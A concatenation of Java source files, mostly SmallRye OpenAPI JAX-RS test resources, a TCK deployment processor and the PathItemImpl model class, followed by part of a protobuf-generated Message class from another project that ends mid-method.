import jakarta.ws.rs.BeanParam;
import jakarta.ws.rs.Consumes;
import jakarta.ws.rs.POST;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
@Path(value = "/integer-string")
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = MediaType.APPLICATION_JSON)
public class IntegerStringUUIDResource extends BaseGenericResource<Integer, String, UUID> {
@POST
@Path(value = "save")
public Integer update(Integer value, @BeanParam GenericBean<String> gbean) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/BVTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.tags.Tag;
@Path(value = "/bv")
public class BVTestResource {
@SuppressWarnings(value = "unused")
@Path(value = "/test-container")
@POST
@Produces(value = MediaType.APPLICATION_JSON)
@Consumes(value = MediaType.APPLICATION_JSON)
@Tag(name = "Test", description = "Testing the container")
public BVTestContainer getTestContainer(BVTestResourceEntity parameter) {
return new BVTestContainer();
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Pet.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.json.JsonString;
public class Pet {
String id;
JsonString name;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/GenericResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
public class GenericResource {
@GET
@Path(value = "/extension")
@Produces(value = MediaType.TEXT_PLAIN)
public String helloExtension() {
return "hello extension";
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamMultipartFormInheritanceResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.BeanParam;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.Response;
import org.jboss.resteasy.annotations.providers.multipart.MultipartForm;
@Path(value = "/")
public class BeanParamMultipartFormInheritanceResource {
@POST
@Path(value = "/uploadIcon")
@Consumes(value = MediaType.MULTIPART_FORM_DATA)
public Response uploadUserAvatar(@MultipartForm MultipartFormUploadIconForm form) {
return null;
}
@GET
@Path(value = "/beanparambase")
public Response getWithBeanParams(@BeanParam BeanParamBase params) {
return null;
}
@GET
@Path(value = "/beanparamimpl")
public Response getWithBeanParams(@BeanParam BeanParamImpl params) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/TypeVariableResponseTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import java.util.List;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.PathParam;
@Path(value = "/variable-types")
@SuppressWarnings(value = "unused")
public class TypeVariableResponseTestResource<TEST extends TypeVariableResponseTestResource.Dto> {
public static class Dto {
String id;
}
@GET
public List<TEST> getAll() {
return null;
}
@GET
@Path(value = "{id}")
public TEST getOne(@PathParam(value = "id") String id) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Fruit.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.List;
public class Fruit {
String description;
String name;
List<Seed> seeds;
}
<|start_filename|>testsuite/tck/src/test/java/io/smallrye/openapi/tck/DeploymentProcessor.java<|end_filename|>
package io.smallrye.openapi.tck;
import static io.smallrye.openapi.runtime.OpenApiProcessor.getFilter;
import static io.smallrye.openapi.runtime.OpenApiProcessor.modelFromAnnotations;
import static io.smallrye.openapi.runtime.OpenApiProcessor.modelFromReader;
import static io.smallrye.openapi.runtime.io.Format.JSON;
import static io.smallrye.openapi.runtime.io.Format.YAML;
import static io.smallrye.openapi.runtime.io.OpenApiSerializer.serialize;
import static java.lang.Thread.currentThread;
import static java.nio.charset.StandardCharsets.UTF_8;
import static java.util.Optional.ofNullable;
import java.io.File;
import java.io.IOException;
import java.io.InputStreamReader;
import java.util.Collection;
import java.util.Optional;
import java.util.Properties;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.stream.Stream;
import org.eclipse.microprofile.config.ConfigProvider;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.arquillian.container.test.spi.client.deployment.ApplicationArchiveProcessor;
import org.jboss.arquillian.test.spi.TestClass;
import org.jboss.jandex.DotName;
import org.jboss.jandex.Index;
import org.jboss.jandex.Indexer;
import org.jboss.shrinkwrap.api.Archive;
import org.jboss.shrinkwrap.api.ArchivePaths;
import org.jboss.shrinkwrap.api.Node;
import org.jboss.shrinkwrap.api.asset.ByteArrayAsset;
import org.jboss.shrinkwrap.api.asset.EmptyAsset;
import org.jboss.shrinkwrap.api.asset.StringAsset;
import org.jboss.shrinkwrap.api.spec.WebArchive;
import org.jboss.shrinkwrap.resolver.api.maven.Maven;
import io.smallrye.config.PropertiesConfigSource;
import io.smallrye.config.SmallRyeConfig;
import io.smallrye.config.SmallRyeConfigBuilder;
import io.smallrye.openapi.api.OpenApiConfig;
import io.smallrye.openapi.api.OpenApiConfigImpl;
import io.smallrye.openapi.api.OpenApiDocument;
import io.smallrye.openapi.runtime.OpenApiProcessor;
import io.smallrye.openapi.runtime.OpenApiStaticFile;
import io.smallrye.openapi.runtime.io.Format;
import io.smallrye.openapi.runtime.scanner.FilteredIndexView;
public class DeploymentProcessor implements ApplicationArchiveProcessor {
private static Logger LOGGER = Logger.getLogger(DeploymentProcessor.class.getName());
public static volatile ClassLoader classLoader;
@Override
public void process(Archive<?> archive, TestClass testClass) {
if (classLoader == null) {
classLoader = Thread.currentThread().getContextClassLoader();
}
if (archive instanceof WebArchive) {
WebArchive war = (WebArchive) archive;
war.addClass(OpenApiRegistration.class);
war.addClass(OpenApiApplication.class);
war.addClass(OpenApiEndpoint.class);
war.addAsWebInfResource(EmptyAsset.INSTANCE, ArchivePaths.create("beans.xml"));
// This sets the war name as the context root
war.addAsWebInfResource(
new StringAsset("<Configure class=\"org.eclipse.jetty.webapp.WebAppContext\">\n" +
" <Set name=\"contextPath\">/" + war.getName() + "</Set>\n" +
" ...\n" +
"</Configure>"),
ArchivePaths.create("jetty-web.xml"));
// Add the required dependencies
String[] deps = {
"org.jboss.resteasy:resteasy-servlet-initializer",
"org.jboss.resteasy:resteasy-cdi",
"org.jboss.resteasy:resteasy-json-binding-provider",
"io.smallrye:smallrye-open-api-core",
"io.smallrye:smallrye-open-api-jaxrs"
};
File[] dependencies = Maven.configureResolver()
.workOffline()
.loadPomFromFile(new File("pom.xml"))
.resolve(deps)
.withoutTransitivity()
.asFile();
war.addAsLibraries(dependencies);
generateOpenAPI(war);
LOGGER.log(Level.FINE, () -> war.toString(true));
}
}
/**
* Builds the OpenAPI file and copies it to the deployed application.
*/
private static void generateOpenAPI(final WebArchive war) {
OpenApiConfig openApiConfig = config(war);
Index index = index(war, openApiConfig);
ClassLoader contextClassLoader = currentThread().getContextClassLoader();
Optional<OpenAPI> annotationModel = ofNullable(modelFromAnnotations(openApiConfig, contextClassLoader, index));
Optional<OpenAPI> readerModel = ofNullable(modelFromReader(openApiConfig, contextClassLoader));
Optional<OpenAPI> staticFileModel = Stream.of(modelFromFile(war, "/META-INF/openapi.json", JSON),
modelFromFile(war, "/META-INF/openapi.yaml", YAML),
modelFromFile(war, "/META-INF/openapi.yml", YAML))
.filter(Optional::isPresent)
.findFirst()
.flatMap(openAPI -> openAPI);
OpenApiDocument document = OpenApiDocument.INSTANCE;
document.reset();
document.config(openApiConfig);
annotationModel.ifPresent(document::modelFromAnnotations);
readerModel.ifPresent(document::modelFromReader);
staticFileModel.ifPresent(document::modelFromStaticFile);
document.filter(getFilter(openApiConfig, contextClassLoader));
document.initialize();
OpenAPI openAPI = document.get();
try {
war.addAsManifestResource(new ByteArrayAsset(serialize(openAPI, JSON).getBytes(UTF_8)), "openapi.json");
war.addAsManifestResource(new ByteArrayAsset(serialize(openAPI, YAML).getBytes(UTF_8)), "openapi.yaml");
} catch (IOException e) {
// Ignore
}
document.reset();
}
/**
* Provides the Jandex index.
*/
private static Index index(final WebArchive war, final OpenApiConfig config) {
FilteredIndexView filteredIndexView = new FilteredIndexView(null, config);
Indexer indexer = new Indexer();
Collection<Node> classes = war.getContent(object -> object.get().endsWith(".class")).values();
for (Node value : classes) {
try {
String resource = value.getPath().get().replaceAll("/WEB-INF/classes/", "");
// We remove the OpenApinEndpoint so the /openapi is not generated
if (resource.contains(OpenApiEndpoint.class.getSimpleName())) {
continue;
}
DotName dotName = DotName.createSimple(resource.replaceAll("/", ".").substring(0, resource.length() - 6));
if (filteredIndexView.accepts(dotName)) {
indexer.index(DeploymentProcessor.class.getClassLoader().getResourceAsStream(resource));
}
} catch (IOException e) {
// Ignore
}
}
return indexer.complete();
}
/**
* Creates the config from the microprofile-config.properties file in the application. The spec defines that the
* config file may be present in two locations.
*/
private static OpenApiConfig config(final WebArchive war) {
Optional<Node> microprofileConfig = Stream.of(ofNullable(war.get("/META-INF/microprofile-config.properties")),
ofNullable(war.get("/WEB-INF/classes/META-INF/microprofile-config.properties")))
.filter(Optional::isPresent)
.findFirst()
.flatMap(node -> node);
if (!microprofileConfig.isPresent()) {
return new OpenApiConfigImpl(ConfigProvider.getConfig());
}
Properties properties = new Properties();
try (InputStreamReader reader = new InputStreamReader(microprofileConfig.get().getAsset().openStream(), UTF_8)) {
properties.load(reader);
} catch (IOException e) {
e.printStackTrace();
}
SmallRyeConfig config = new SmallRyeConfigBuilder()
.addDefaultSources()
.addDefaultInterceptors()
.withSources(new PropertiesConfigSource(properties, "microprofile-config.properties"))
.build();
return new OpenApiConfigImpl(config);
}
private static Optional<OpenAPI> modelFromFile(final WebArchive war, final String location,
final Format format) {
return ofNullable(war.get(location))
.map(Node::getAsset)
.map(asset -> new OpenApiStaticFile(asset.openStream(), format))
.map(OpenApiProcessor::modelFromStaticFile);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BaseGenericResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.util.Map;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.QueryParam;
public class BaseGenericResource<T1, T2, T3> {
public static class GenericBean<G> {
@QueryParam(value = "g1")
G g1;
}
@GET
@Path(value = "typevar")
public T1 test(@QueryParam(value = "q1") T2 q1) {
return null;
}
@GET
@Path(value = "map")
public Map<T2, T3> getMap(T1 filter) {
return null;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/OneSidedParent.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class OneSidedParent {
@Schema(hidden = true)
public String getParentProp1() {
return "";
}
@Schema(hidden = true)
public void setParentProp2(String something) {
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/models/PathItemImpl.java<|end_filename|>
package io.smallrye.openapi.api.models;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.eclipse.microprofile.openapi.models.Operation;
import org.eclipse.microprofile.openapi.models.PathItem;
import org.eclipse.microprofile.openapi.models.parameters.Parameter;
import org.eclipse.microprofile.openapi.models.servers.Server;
import io.smallrye.openapi.runtime.util.ModelUtil;
/**
* An implementation of the {@link PathItem} OpenAPI model interface.
*/
public class PathItemImpl extends ExtensibleImpl<PathItem> implements PathItem, ModelImpl {
private String ref;
private String summary;
private String description;
private Operation get;
private Operation put;
private Operation post;
private Operation delete;
private Operation options;
private Operation head;
private Operation patch;
private Operation trace;
private List<Parameter> parameters;
private List<Server> servers;
/**
* @see org.eclipse.microprofile.openapi.models.Reference#getRef()
*/
@Override
public String getRef() {
return ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.Reference#setRef(java.lang.String)
*/
@Override
public void setRef(String ref) {
this.ref = ref;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getSummary()
*/
@Override
public String getSummary() {
return this.summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setSummary(java.lang.String)
*/
@Override
public void setSummary(String summary) {
this.summary = summary;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#summary(java.lang.String)
*/
@Override
public PathItem summary(String summary) {
this.summary = summary;
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getDescription()
*/
@Override
public String getDescription() {
return this.description;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setDescription(java.lang.String)
*/
@Override
public void setDescription(String description) {
this.description = description;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getGET()
*/
@Override
public Operation getGET() {
return this.get;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setGET(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setGET(Operation get) {
this.get = get;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getPUT()
*/
@Override
public Operation getPUT() {
return this.put;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setPUT(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setPUT(Operation put) {
this.put = put;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getPOST()
*/
@Override
public Operation getPOST() {
return this.post;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setPOST(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setPOST(Operation post) {
this.post = post;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getDELETE()
*/
@Override
public Operation getDELETE() {
return this.delete;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setDELETE(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setDELETE(Operation delete) {
this.delete = delete;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getOPTIONS()
*/
@Override
public Operation getOPTIONS() {
return this.options;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setOPTIONS(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setOPTIONS(Operation options) {
this.options = options;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getHEAD()
*/
@Override
public Operation getHEAD() {
return this.head;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setHEAD(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setHEAD(Operation head) {
this.head = head;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getPATCH()
*/
@Override
public Operation getPATCH() {
return this.patch;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setPATCH(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setPATCH(Operation patch) {
this.patch = patch;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getTRACE()
*/
@Override
public Operation getTRACE() {
return this.trace;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setTRACE(org.eclipse.microprofile.openapi.models.Operation)
*/
@Override
public void setTRACE(Operation trace) {
this.trace = trace;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getOperations()
*/
@Override
public Map<HttpMethod, Operation> getOperations() {
Map<HttpMethod, Operation> ops = new LinkedHashMap<>();
addOperationToMap(HttpMethod.GET, this.get, ops);
addOperationToMap(HttpMethod.PUT, this.put, ops);
addOperationToMap(HttpMethod.POST, this.post, ops);
addOperationToMap(HttpMethod.DELETE, this.delete, ops);
addOperationToMap(HttpMethod.OPTIONS, this.options, ops);
addOperationToMap(HttpMethod.HEAD, this.head, ops);
addOperationToMap(HttpMethod.PATCH, this.patch, ops);
addOperationToMap(HttpMethod.TRACE, this.trace, ops);
return ops;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setOperation(PathItem.HttpMethod, Operation)
*/
@Override
public void setOperation(PathItem.HttpMethod httpMethod, Operation operation) {
switch (httpMethod) {
case GET:
this.get = operation;
break;
case POST:
this.post = operation;
break;
case PUT:
this.put = operation;
break;
case DELETE:
this.delete = operation;
break;
case PATCH:
this.patch = operation;
break;
case OPTIONS:
this.options = operation;
break;
case HEAD:
this.head = operation;
break;
case TRACE:
this.trace = operation;
break;
} // SWITCH
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getServers()
*/
@Override
public List<Server> getServers() {
return ModelUtil.unmodifiableList(this.servers);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setServers(java.util.List)
*/
@Override
public void setServers(List<Server> servers) {
this.servers = ModelUtil.replace(servers, ArrayList<Server>::new);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#addServer(org.eclipse.microprofile.openapi.models.servers.Server)
*/
@Override
public PathItem addServer(Server server) {
this.servers = ModelUtil.add(server, this.servers, ArrayList<Server>::new);
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#removeServer(org.eclipse.microprofile.openapi.models.servers.Server)
*/
@Override
public void removeServer(Server server) {
ModelUtil.remove(this.servers, server);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#getParameters()
*/
@Override
public List<Parameter> getParameters() {
return ModelUtil.unmodifiableList(this.parameters);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#setParameters(java.util.List)
*/
@Override
public void setParameters(List<Parameter> parameters) {
this.parameters = ModelUtil.replace(parameters, ArrayList<Parameter>::new);
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#addParameter(org.eclipse.microprofile.openapi.models.parameters.Parameter)
*/
@Override
public PathItem addParameter(Parameter parameter) {
this.parameters = ModelUtil.add(parameter, this.parameters, ArrayList<Parameter>::new);
return this;
}
/**
* @see org.eclipse.microprofile.openapi.models.PathItem#removeParameter(org.eclipse.microprofile.openapi.models.parameters.Parameter)
*/
@Override
public void removeParameter(Parameter parameter) {
ModelUtil.remove(this.parameters, parameter);
}
/**
* Adds the given operation to the given map only if the operation is not null.
*
* @param method
* @param operation
* @param operationMap
*/
private void addOperationToMap(HttpMethod method, Operation operation, Map<HttpMethod, Operation> operationMap) {
if (operation != null) {
operationMap.put(method, operation);
}
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamImpl.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.CookieParam;
public class BeanParamImpl extends BeanParamBase implements BeanParamAddon {
@CookieParam(value = "cc1")
String cc1;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParametersInConstructorTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.validation.constraints.NotNull;
import javax.ws.rs.BeanParam;
import javax.ws.rs.CookieParam;
import javax.ws.rs.DELETE;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.HeaderParam;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.QueryParam;
import org.eclipse.microprofile.openapi.annotations.enums.ParameterIn;
import org.eclipse.microprofile.openapi.annotations.parameters.Parameter;
@Path(value = "/parameters-in-constructor/{id}/{p1}")
@SuppressWarnings(value = "unused")
public class ParametersInConstructorTestResource {
public static class Bean {
@PathParam(value = "id")
@DefaultValue(value = "BEAN")
String id;
}
private Bean param;
public ParametersInConstructorTestResource(
@Parameter(name = "h1", in = ParameterIn.HEADER, description = "Description of h1") @HeaderParam(value = "h1") @Deprecated String h1,
@Parameter(name = "h2", in = ParameterIn.HEADER, hidden = true) @HeaderParam(value = "h2") String h2,
@Parameter(name = "q1", deprecated = true) @QueryParam(value = "q1") String q1,
@NotNull @CookieParam(value = "c1") String c1, @PathParam(value = "p1") String p1, @BeanParam Bean b1) {
}
@DELETE
public void deleteWidget() {
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/XmlAccessTypePublicMember.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.xml.bind.annotation.XmlAccessType;
import jakarta.xml.bind.annotation.XmlAccessorType;
@XmlAccessorType(value = XmlAccessType.PUBLIC_MEMBER)
public class XmlAccessTypePublicMember {
public String prop1Field;
@SuppressWarnings(value = "unused")
private String prop2Field;
public String getProp3Property() {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/MultipartFormUploadIconForm.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.FormParam;
public class MultipartFormUploadIconForm extends MultipartFormVerify {
@FormParam(value = "icon")
public byte[] icon;
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ParameterRefTestApplication.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.core.Application;
import org.eclipse.microprofile.openapi.annotations.Components;
import org.eclipse.microprofile.openapi.annotations.OpenAPIDefinition;
import org.eclipse.microprofile.openapi.annotations.enums.ParameterIn;
import org.eclipse.microprofile.openapi.annotations.info.Info;
import org.eclipse.microprofile.openapi.annotations.parameters.Parameter;
@OpenAPIDefinition(info = @Info(title = "title", version = "1"), components = @Components(parameters = {
@Parameter(name = "queryParam1", in = ParameterIn.QUERY),
@Parameter(name = "pathParam2", in = ParameterIn.PATH, description = "`pathParam2` with info in components") }))
public class ParameterRefTestApplication extends Application {
}
| gasper-vrhovsek/smallrye-open-api |
<|start_filename|>java/src/com/zlalanne/Message.java<|end_filename|>
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: message.proto
package com.zlalanne;
public final class Message {
private Message() {}
public static void registerAllExtensions(
com.google.protobuf.ExtensionRegistry registry) {
}
public interface CommandOrBuilder extends
// @@protoc_insertion_point(interface_extends:Command)
com.google.protobuf.MessageOrBuilder {
/**
* <code>required .Command.CommandType type = 1;</code>
*/
boolean hasType();
/**
* <code>required .Command.CommandType type = 1;</code>
*/
com.zlalanne.Message.Command.CommandType getType();
/**
* <code>required string name = 2;</code>
*/
boolean hasName();
/**
* <code>required string name = 2;</code>
*/
java.lang.String getName();
/**
* <code>required string name = 2;</code>
*/
com.google.protobuf.ByteString
getNameBytes();
/**
* <code>optional string data = 3;</code>
*/
boolean hasData();
/**
* <code>optional string data = 3;</code>
*/
java.lang.String getData();
/**
* <code>optional string data = 3;</code>
*/
com.google.protobuf.ByteString
getDataBytes();
}
/**
* Protobuf type {@code Command}
*/
public static final class Command extends
com.google.protobuf.GeneratedMessage implements
// @@protoc_insertion_point(message_implements:Command)
CommandOrBuilder {
// Use Command.newBuilder() to construct.
private Command(com.google.protobuf.GeneratedMessage.Builder<?> builder) {
super(builder);
this.unknownFields = builder.getUnknownFields();
}
private Command(boolean noInit) { this.unknownFields = com.google.protobuf.UnknownFieldSet.getDefaultInstance(); }
private static final Command defaultInstance;
public static Command getDefaultInstance() {
return defaultInstance;
}
public Command getDefaultInstanceForType() {
return defaultInstance;
}
private final com.google.protobuf.UnknownFieldSet unknownFields;
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet
getUnknownFields() {
return this.unknownFields;
}
private Command(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
initFields();
int mutable_bitField0_ = 0;
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
default: {
if (!parseUnknownField(input, unknownFields,
extensionRegistry, tag)) {
done = true;
}
break;
}
case 8: {
int rawValue = input.readEnum();
com.zlalanne.Message.Command.CommandType value = com.zlalanne.Message.Command.CommandType.valueOf(rawValue);
if (value == null) {
unknownFields.mergeVarintField(1, rawValue);
} else {
bitField0_ |= 0x00000001;
type_ = value;
}
break;
}
case 18: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000002;
name_ = bs;
break;
}
case 26: {
com.google.protobuf.ByteString bs = input.readBytes();
bitField0_ |= 0x00000004;
data_ = bs;
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(
e.getMessage()).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor
getDescriptor() {
return com.zlalanne.Message.internal_static_Command_descriptor;
}
protected com.google.protobuf.GeneratedMessage.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.zlalanne.Message.internal_static_Command_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.zlalanne.Message.Command.class, com.zlalanne.Message.Command.Builder.class);
}
public static com.google.protobuf.Parser<Command> PARSER =
new com.google.protobuf.AbstractParser<Command>() {
public Command parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new Command(input, extensionRegistry);
}
};
@java.lang.Override
public com.google.protobuf.Parser<Command> getParserForType() {
return PARSER;
}
/**
* Protobuf enum {@code Command.CommandType}
*/
public enum CommandType
implements com.google.protobuf.ProtocolMessageEnum {
/**
* <code>START_TEST = 0;</code>
*/
START_TEST(0, 0),
/**
* <code>RESULTS = 1;</code>
*/
RESULTS(1, 1),
/**
* <code>SHUTDOWN = 2;</code>
*/
SHUTDOWN(2, 2),
;
/**
* <code>START_TEST = 0;</code>
*/
public static final int START_TEST_VALUE = 0;
/**
* <code>RESULTS = 1;</code>
*/
public static final int RESULTS_VALUE = 1;
/**
* <code>SHUTDOWN = 2;</code>
*/
public static final int SHUTDOWN_VALUE = 2;
public final int getNumber() { return value; }
public static CommandType valueOf(int value) {
switch (value) {
case 0: return START_TEST;
case 1: return RESULTS;
case 2: return SHUTDOWN;
default: return null;
}
}
public static com.google.protobuf.Internal.EnumLiteMap<CommandType>
internalGetValueMap() {
return internalValueMap;
}
private static com.google.protobuf.Internal.EnumLiteMap<CommandType>
internalValueMap =
new com.google.protobuf.Internal.EnumLiteMap<CommandType>() {
public CommandType findValueByNumber(int number) {
return CommandType.valueOf(number);
}
};
public final com.google.protobuf.Descriptors.EnumValueDescriptor
getValueDescriptor() {
return getDescriptor().getValues().get(index);
}
public final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptorForType() {
return getDescriptor();
}
public static final com.google.protobuf.Descriptors.EnumDescriptor
getDescriptor() {
return com.zlalanne.Message.Command.getDescriptor().getEnumTypes().get(0);
}
private static final CommandType[] VALUES = values();
public static CommandType valueOf(
com.google.protobuf.Descriptors.EnumValueDescriptor desc) {
if (desc.getType() != getDescriptor()) {
throw new java.lang.IllegalArgumentException(
"EnumValueDescriptor is not for this type.");
}
return VALUES[desc.getIndex()];
}
private final int index;
private final int value;
private CommandType(int index, int value) {
this.index = index;
this.value = value;
}
// @@protoc_insertion_point(enum_scope:Command.CommandType)
}
private int bitField0_;
public static final int TYPE_FIELD_NUMBER = 1;
private com.zlalanne.Message.Command.CommandType type_;
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public boolean hasType() {
return ((bitField0_ & 0x00000001) == 0x00000001);
}
/**
* <code>required .Command.CommandType type = 1;</code>
*/
public com.zlalanne.Message.Command.CommandType getType() {
return type_;
}
public static final int NAME_FIELD_NUMBER = 2;
private java.lang.Object name_;
/**
* <code>required string name = 2;</code>
*/
public boolean hasName() {
return ((bitField0_ & 0x00000002) == 0x00000002);
}
/**
* <code>required string name = 2;</code>
*/
public java.lang.String getName() {
java.lang.Object ref = name_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
name_ = s;
}
return s;
}
}
/**
* <code>required string name = 2;</code>
*/
public com.google.protobuf.ByteString
getNameBytes() {
java.lang.Object ref = name_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
name_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
public static final int DATA_FIELD_NUMBER = 3;
private java.lang.Object data_;
/**
* <code>optional string data = 3;</code>
*/
public boolean hasData() {
return ((bitField0_ & 0x00000004) == 0x00000004);
}
/**
* <code>optional string data = 3;</code>
*/
public java.lang.String getData() {
java.lang.Object ref = data_;
if (ref instanceof java.lang.String) {
return (java.lang.String) ref;
} else {
com.google.protobuf.ByteString bs =
(com.google.protobuf.ByteString) ref;
java.lang.String s = bs.toStringUtf8();
if (bs.isValidUtf8()) {
data_ = s;
}
return s;
}
}
/**
* <code>optional string data = 3;</code>
*/
public com.google.protobuf.ByteString
getDataBytes() {
java.lang.Object ref = data_;
if (ref instanceof java.lang.String) {
com.google.protobuf.ByteString b =
com.google.protobuf.ByteString.copyFromUtf8(
(java.lang.String) ref);
data_ = b;
return b;
} else {
return (com.google.protobuf.ByteString) ref;
}
}
private void initFields() {
type_ = com.zlalanne.Message.Command.CommandType.START_TEST;
name_ = "";
data_ = "";
}
private byte memoizedIsInitialized = -1;
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
if (!hasType()) {
